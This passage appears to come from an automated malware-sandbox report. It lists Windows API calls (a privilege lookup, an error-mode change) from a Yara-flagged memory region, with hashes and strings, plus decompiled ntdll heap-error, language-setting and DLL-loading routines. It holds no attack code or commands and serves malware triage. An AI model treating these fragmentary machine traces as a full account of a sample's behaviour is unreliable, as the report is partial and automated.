                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 6822cbe0780f4165a37d3c6cb5f31b58303dc102fcf58aad1fb7f3e3adb1db1f
                        • Instruction ID: 8eab57edbbd046f5430d0f9c08448e6487381265c93c2f4c556e0b181a5c917d
                        • Opcode Fuzzy Hash: 6822cbe0780f4165a37d3c6cb5f31b58303dc102fcf58aad1fb7f3e3adb1db1f
                        • Instruction Fuzzy Hash: FEE04FB56002046FDB10DF45DC86EE777A9EF89750F018565FE4C5B242D934E9108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0048F192,0048F192,?,00000000,?,?), ref: 0049A1F0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 65e0494bec39a1f6fea73c8969ee90dd77cf6c9ceb3f3963c882282482821b57
                        • Instruction ID: 35ccb0a8b7894abf5434b7cd2584513c7b69b746a121b91d9a49510df3e5ddbd
                        • Opcode Fuzzy Hash: 65e0494bec39a1f6fea73c8969ee90dd77cf6c9ceb3f3963c882282482821b57
                        • Instruction Fuzzy Hash: 6EE09AB02082502BCB10DB258C82E9B3FA8EF89260F1885A9FC8817202C538A42487F5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00488CF4,?), ref: 0048F6BB
                        Memory Dump Source
                        • Source File: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Offset: 00480000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                        • Instruction ID: 415c86087b103a290d44c69c3ec54f8d32621617745fc3c699d5297c1b878bed
                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                        • Instruction Fuzzy Hash: 85D0A7727903043BEA10FAA5DC03F2732CC6B44B04F490474F948EB3C3E954E4014169
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 78d748ca63b50c93eba9a8d4ff7d20b15ef138933d4ea49d32b59b90b87411f3
                        • Instruction ID: 56c531700f88d12d4fe070645641a46b26482cdb29d1eb6c1990049a83ba177e
                        • Opcode Fuzzy Hash: 78d748ca63b50c93eba9a8d4ff7d20b15ef138933d4ea49d32b59b90b87411f3
                        • Instruction Fuzzy Hash: 25B09B729064C5D5D711D76046087177904B7D0741F16C095D1020681B4778D191F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        • This failed because of error %Ix., xrefs: 02BAB446
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02BAB47D
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02BAB39B
                        • *** enter .cxr %p for the context, xrefs: 02BAB50D
                        • *** enter .exr %p for the exception record, xrefs: 02BAB4F1
                        • an invalid address, %p, xrefs: 02BAB4CF
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02BAB305
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02BAB53F
                        • Go determine why that thread has not released the critical section., xrefs: 02BAB3C5
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02BAB484
                        • a NULL pointer, xrefs: 02BAB4E0
                        • The instruction at %p tried to %s , xrefs: 02BAB4B6
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02BAB323
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02BAB2DC
                        • The instruction at %p referenced memory at %p., xrefs: 02BAB432
                        • The resource is owned exclusively by thread %p, xrefs: 02BAB374
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02BAB476
                        • *** An Access Violation occurred in %ws:%s, xrefs: 02BAB48F
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02BAB38F
                        • <unknown>, xrefs: 02BAB27E, 02BAB2D1, 02BAB350, 02BAB399, 02BAB417, 02BAB48E
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 02BAB352
                        • The critical section is owned by thread %p., xrefs: 02BAB3B9
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02BAB314
                        • The resource is owned shared by %d threads, xrefs: 02BAB37E
                        • write to, xrefs: 02BAB4A6
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02BAB2F3
                        • *** then kb to get the faulting stack, xrefs: 02BAB51C
                        • read from, xrefs: 02BAB4AD, 02BAB4B2
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02BAB3D6
                        • *** Inpage error in %ws:%s, xrefs: 02BAB418
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 06a768cd34845b52bc465991ca5c16d77f95b0df03c04f9593a7632b638f53ef
                        • Instruction ID: f4ad7af12d183902253eaf10b97fb0d616d80ab947eba8dec392afb18658a0f9
                        • Opcode Fuzzy Hash: 06a768cd34845b52bc465991ca5c16d77f95b0df03c04f9593a7632b638f53ef
                        • Instruction Fuzzy Hash: 0E812635A04200FFEF31AA058CA5E7B3B2AEF66B59F4580C5F51B2B112DB618552CB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02BB1C06() {
                        				signed int _t27;
                        				char* _t104;
                        				char* _t105;
                        				intOrPtr _t113;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t119;
                        				intOrPtr _t120;
                        
                        				_t105 = 0x2ad48a4;
                        				_t104 = "HEAP: ";
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02AFB150();
                        				} else {
                        					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push( *0x2be589c);
                        				E02AFB150("Heap error detected at %p (heap handle %p)\n",  *0x2be58a0);
                        				_t27 =  *0x2be5898; // 0x0
                        				if(_t27 <= 0xf) {
                        					switch( *((intOrPtr*)(_t27 * 4 +  &M02BB1E96))) {
                        						case 0:
                        							_t105 = "heap_failure_internal";
                        							goto L21;
                        						case 1:
                        							goto L21;
                        						case 2:
                        							goto L21;
                        						case 3:
                        							goto L21;
                        						case 4:
                        							goto L21;
                        						case 5:
                        							goto L21;
                        						case 6:
                        							goto L21;
                        						case 7:
                        							goto L21;
                        						case 8:
                        							goto L21;
                        						case 9:
                        							goto L21;
                        						case 0xa:
                        							goto L21;
                        						case 0xb:
                        							goto L21;
                        						case 0xc:
                        							goto L21;
                        						case 0xd:
                        							goto L21;
                        						case 0xe:
                        							goto L21;
                        						case 0xf:
                        							goto L21;
                        					}
                        				}
                        				L21:
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02AFB150();
                        				} else {
                        					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push(_t105);
                        				E02AFB150("Error code: %d - %s\n",  *0x2be5898);
                        				_t113 =  *0x2be58a4; // 0x0
                        				if(_t113 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02AFB150();
                        					} else {
                        						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02AFB150("Parameter1: %p\n",  *0x2be58a4);
                        				}
                        				_t115 =  *0x2be58a8; // 0x0
                        				if(_t115 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02AFB150();
                        					} else {
                        						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02AFB150("Parameter2: %p\n",  *0x2be58a8);
                        				}
                        				_t117 =  *0x2be58ac; // 0x0
                        				if(_t117 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02AFB150();
                        					} else {
                        						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02AFB150("Parameter3: %p\n",  *0x2be58ac);
                        				}
                        				_t119 =  *0x2be58b0; // 0x0
                        				if(_t119 != 0) {
                        					L41:
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02AFB150();
                        					} else {
                        						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *0x2be58b4);
                        					E02AFB150("Last known valid blocks: before - %p, after - %p\n",  *0x2be58b0);
                        				} else {
                        					_t120 =  *0x2be58b4; // 0x0
                        					if(_t120 != 0) {
                        						goto L41;
                        					}
                        				}
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02AFB150();
                        				} else {
                        					E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				return E02AFB150("Stack trace available at %p\n", 0x2be58c0);
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: 282c068389a5cc83da3f0629836d2531c52c3a6f3464fcbd0fece55c301d8bbd
                        • Instruction ID: d1da4f0e58990579fb4bd57f18f1153173484c9122e910833a67ec76eeb050f3
                        • Opcode Fuzzy Hash: 282c068389a5cc83da3f0629836d2531c52c3a6f3464fcbd0fece55c301d8bbd
                        • Instruction Fuzzy Hash: D16126369A1144DFDA52DB88D694D3173B5EF08A35B0984AAF50F5F312CFB89841CF29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02B03D34(signed int* __ecx) {
                        				signed int* _v8;
                        				char _v12;
                        				signed int* _v16;
                        				signed int* _v20;
                        				char _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int* _v48;
                        				signed int* _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				char _v68;
                        				signed int _t140;
                        				signed int _t161;
                        				signed int* _t236;
                        				signed int* _t242;
                        				signed int* _t243;
                        				signed int* _t244;
                        				signed int* _t245;
                        				signed int _t255;
                        				void* _t257;
                        				signed int _t260;
                        				void* _t262;
                        				signed int _t264;
                        				void* _t267;
                        				signed int _t275;
                        				signed int* _t276;
                        				short* _t277;
                        				signed int* _t278;
                        				signed int* _t279;
                        				signed int* _t280;
                        				short* _t281;
                        				signed int* _t282;
                        				short* _t283;
                        				signed int* _t284;
                        				void* _t285;
                        
                        				_v60 = _v60 | 0xffffffff;
                        				_t280 = 0;
                        				_t242 = __ecx;
                        				_v52 = __ecx;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v40 = 0;
                        				_v28 = 0;
                        				_v32 = 0;
                        				_v44 = 0;
                        				_v56 = 0;
                        				_t275 = 0;
                        				_v16 = 0;
                        				if(__ecx == 0) {
                        					_t280 = 0xc000000d;
                        					_t140 = 0;
                        					L50:
                        					 *_t242 =  *_t242 | 0x00000800;
                        					_t242[0x13] = _t140;
                        					_t242[0x16] = _v40;
                        					_t242[0x18] = _v28;
                        					_t242[0x14] = _v32;
                        					_t242[0x17] = _t275;
                        					_t242[0x15] = _v44;
                        					_t242[0x11] = _v56;
                        					_t242[0x12] = _v60;
                        					return _t280;
                        				}
                        				if(E02B01B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v56 = 1;
                        					if(_v8 != 0) {
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                        					}
                        					_v8 = _t280;
                        				}
                        				if(E02B01B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v60 =  *_v8;
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                        					_v8 = _t280;
                        				}
                        				if(E02B01B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                        					L16:
                        					if(E02B01B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                        						L28:
                        						if(E02B01B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                        							L46:
                        							_t275 = _v16;
                        							L47:
                        							_t161 = 0;
                        							L48:
                        							if(_v8 != 0) {
                        								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                        							}
                        							_t140 = _v20;
                        							if(_t140 != 0) {
                        								if(_t275 != 0) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        									_t275 = 0;
                        									_v28 = 0;
                        									_t140 = _v20;
                        								}
                        							}
                        							goto L50;
                        						}
                        						_t167 = _v12;
                        						_t255 = _v12 + 4;
                        						_v44 = _t255;
                        						if(_t255 == 0) {
                        							_t276 = _t280;
                        							_v32 = _t280;
                        						} else {
                        							_t276 = L02B14620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                        							_t167 = _v12;
                        							_v32 = _t276;
                        						}
                        						if(_t276 == 0) {
                        							_v44 = _t280;
                        							_t280 = 0xc0000017;
                        							goto L46;
                        						} else {
                        							E02B3F3E0(_t276, _v8, _t167);
                        							_v48 = _t276;
                        							_t277 = E02B41370(_t276, 0x2ad4e90);
                        							_pop(_t257);
                        							if(_t277 == 0) {
                        								L38:
                        								_t170 = _v48;
                        								if( *_v48 != 0) {
                        									E02B3BB40(0,  &_v68, _t170);
                        									if(L02B043C0( &_v68,  &_v24) != 0) {
                        										_t280 =  &(_t280[0]);
                        									}
                        								}
                        								if(_t280 == 0) {
                        									_t280 = 0;
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                        									_v44 = 0;
                        									_v32 = 0;
                        								} else {
                        									_t280 = 0;
                        								}
                        								_t174 = _v8;
                        								if(_v8 != 0) {
                        									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                        								}
                        								_v8 = _t280;
                        								goto L46;
                        							}
                        							_t243 = _v48;
                        							do {
                        								 *_t277 = 0;
                        								_t278 = _t277 + 2;
                        								E02B3BB40(_t257,  &_v68, _t243);
                        								if(L02B043C0( &_v68,  &_v24) != 0) {
                        									_t280 =  &(_t280[0]);
                        								}
                        								_t243 = _t278;
                        								_t277 = E02B41370(_t278, 0x2ad4e90);
                        								_pop(_t257);
                        							} while (_t277 != 0);
                        							_v48 = _t243;
                        							_t242 = _v52;
                        							goto L38;
                        						}
                        					}
                        					_t191 = _v12;
                        					_t260 = _v12 + 4;
                        					_v28 = _t260;
                        					if(_t260 == 0) {
                        						_t275 = _t280;
                        						_v16 = _t280;
                        					} else {
                        						_t275 = L02B14620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                        						_t191 = _v12;
                        						_v16 = _t275;
                        					}
                        					if(_t275 == 0) {
                        						_v28 = _t280;
                        						_t280 = 0xc0000017;
                        						goto L47;
                        					} else {
                        						E02B3F3E0(_t275, _v8, _t191);
                        						_t285 = _t285 + 0xc;
                        						_v48 = _t275;
                        						_t279 = _t280;
                        						_t281 = E02B41370(_v16, 0x2ad4e90);
                        						_pop(_t262);
                        						if(_t281 != 0) {
                        							_t244 = _v48;
                        							do {
                        								 *_t281 = 0;
                        								_t282 = _t281 + 2;
                        								E02B3BB40(_t262,  &_v68, _t244);
                        								if(L02B043C0( &_v68,  &_v24) != 0) {
                        									_t279 =  &(_t279[0]);
                        								}
                        								_t244 = _t282;
                        								_t281 = E02B41370(_t282, 0x2ad4e90);
                        								_pop(_t262);
                        							} while (_t281 != 0);
                        							_v48 = _t244;
                        							_t242 = _v52;
                        						}
                        						_t201 = _v48;
                        						_t280 = 0;
                        						if( *_v48 != 0) {
                        							E02B3BB40(_t262,  &_v68, _t201);
                        							if(L02B043C0( &_v68,  &_v24) != 0) {
                        								_t279 =  &(_t279[0]);
                        							}
                        						}
                        						if(_t279 == 0) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                        							_v28 = _t280;
                        							_v16 = _t280;
                        						}
                        						_t202 = _v8;
                        						if(_v8 != 0) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                        						}
                        						_v8 = _t280;
                        						goto L28;
                        					}
                        				}
                        				_t214 = _v12;
                        				_t264 = _v12 + 4;
                        				_v40 = _t264;
                        				if(_t264 == 0) {
                        					_v20 = _t280;
                        				} else {
                        					_t236 = L02B14620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                        					_t280 = _t236;
                        					_v20 = _t236;
                        					_t214 = _v12;
                        				}
                        				if(_t280 == 0) {
                        					_t161 = 0;
                        					_t280 = 0xc0000017;
                        					_v40 = 0;
                        					goto L48;
                        				} else {
                        					E02B3F3E0(_t280, _v8, _t214);
                        					_t285 = _t285 + 0xc;
                        					_v48 = _t280;
                        					_t283 = E02B41370(_t280, 0x2ad4e90);
                        					_pop(_t267);
                        					if(_t283 != 0) {
                        						_t245 = _v48;
                        						do {
                        							 *_t283 = 0;
                        							_t284 = _t283 + 2;
                        							E02B3BB40(_t267,  &_v68, _t245);
                        							if(L02B043C0( &_v68,  &_v24) != 0) {
                        								_t275 = _t275 + 1;
                        							}
                        							_t245 = _t284;
                        							_t283 = E02B41370(_t284, 0x2ad4e90);
                        							_pop(_t267);
                        						} while (_t283 != 0);
                        						_v48 = _t245;
                        						_t242 = _v52;
                        					}
                        					_t224 = _v48;
                        					_t280 = 0;
                        					if( *_v48 != 0) {
                        						E02B3BB40(_t267,  &_v68, _t224);
                        						if(L02B043C0( &_v68,  &_v24) != 0) {
                        							_t275 = _t275 + 1;
                        						}
                        					}
                        					if(_t275 == 0) {
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                        						_v40 = _t280;
                        						_v20 = _t280;
                        					}
                        					_t225 = _v8;
                        					if(_v8 != 0) {
                        						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                        					}
                        					_v8 = _t280;
                        					goto L16;
                        				}
                        			}

                        Strings
                        • Kernel-MUI-Language-SKU, xrefs: 02B03F70
                        • Kernel-MUI-Number-Allowed, xrefs: 02B03D8C
                        • Kernel-MUI-Language-Disallowed, xrefs: 02B03E97
                        • WindowsExcludedProcs, xrefs: 02B03D6F
                        • Kernel-MUI-Language-Allowed, xrefs: 02B03DC0
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: 935d400e19e9de9aba1e6236eeee428e126293ab723038a8ae8fb1aefa700654
                        • Instruction ID: d88c662dc7848a980d70ded148558e7221f3078b9ef7ffb14df8b299c1f30756
                        • Opcode Fuzzy Hash: 935d400e19e9de9aba1e6236eeee428e126293ab723038a8ae8fb1aefa700654
                        • Instruction Fuzzy Hash: 1FF12071D00618EFCB16DF98C980AEEBBB9FF48750F14419AE905A7250EB359E41CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02B28E00(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t43;
                        				void* _t46;
                        				intOrPtr _t47;
                        				void* _t48;
                        				signed int _t49;
                        				void* _t50;
                        				intOrPtr* _t51;
                        				signed int _t52;
                        				void* _t53;
                        				intOrPtr _t55;
                        
                        				_v8 =  *0x2bed360 ^ _t52;
                        				_t49 = 0;
                        				_t48 = __ecx;
                        				_t55 =  *0x2be8464; // 0x74790110
                        				if(_t55 == 0) {
                        					L9:
                        					if( !_t49 >= 0) {
                        						if(( *0x2be5780 & 0x00000003) != 0) {
                        							E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                        						}
                        						if(( *0x2be5780 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        					}
                        					return E02B3B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                        				}
                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                        				_t43 =  *0x2be7984; // 0x603e68
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                        					if(_t48 == _t43) {
                        						_t50 = 0x5c;
                        						if( *_t32 == _t50) {
                        							_t46 = 0x3f;
                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                        								_t32 = _t32 + 8;
                        							}
                        						}
                        					}
                        					_t51 =  *0x2be8464; // 0x74790110
                        					 *0x2beb1e0(_t47, _t32,  &_v12);
                        					_t49 =  *_t51();
                        					if(_t49 >= 0) {
                        						L8:
                        						_t35 = _v12;
                        						if(_t35 != 0) {
                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                        								E02B29B10( *((intOrPtr*)(_t48 + 0x48)));
                        								_t35 = _v12;
                        							}
                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                        						}
                        						goto L9;
                        					}
                        					if(_t49 != 0xc000008a) {
                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                        							if(_t49 != 0xc00000bb) {
                        								goto L8;
                        							}
                        						}
                        					}
                        					if(( *0x2be5780 & 0x00000005) != 0) {
                        						_push(_t49);
                        						E02B75510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                        						_t53 = _t53 + 0x1c;
                        					}
                        					_t49 = 0;
                        					goto L8;
                        				} else {
                        					goto L9;
                        				}
                        			}

                        Strings
                        • LdrpFindDllActivationContext, xrefs: 02B69331, 02B6935D
                        • h>`, xrefs: 02B28E2C
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02B6932A
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 02B69357
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02B6933B, 02B69367
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>`$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3477089597
                        • Opcode ID: 15a7ee422cd7d5353a06ba6fda8394d6c54a926ad5927191f2c97f92a0c7fb81
                        • Instruction ID: d3a752ef38a1e7e0a31536776a95c8ff2b299e6a9106b0e7d75d91bfb0a76c55
                        • Opcode Fuzzy Hash: 15a7ee422cd7d5353a06ba6fda8394d6c54a926ad5927191f2c97f92a0c7fb81
                        • Instruction Fuzzy Hash: CD412732A40335EFEF35BA18C849B75B3B5FB04648F0945E9E80D5B151EB749C88C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E02AF40E1(void* __edx) {
                        				void* _t19;
                        				void* _t29;
                        
                        				_t28 = _t19;
                        				_t29 = __edx;
                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push("HEAP: ");
                        						E02AFB150();
                        					} else {
                        						E02AFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02AFB150("Invalid heap signature for heap at %p", _t28);
                        					if(_t29 != 0) {
                        						E02AFB150(", passed to %s", _t29);
                        					}
                        					_push("\n");
                        					E02AFB150();
                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        						 *0x2be6378 = 1;
                        						asm("int3");
                        						 *0x2be6378 = 0;
                        					}
                        					return 0;
                        				}
                        				return 1;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                        • API String ID: 0-188067316
                        • Opcode ID: 83a29893b7a568f921a667d819577879a0c390d0bcc4cbd39a80424138a11400
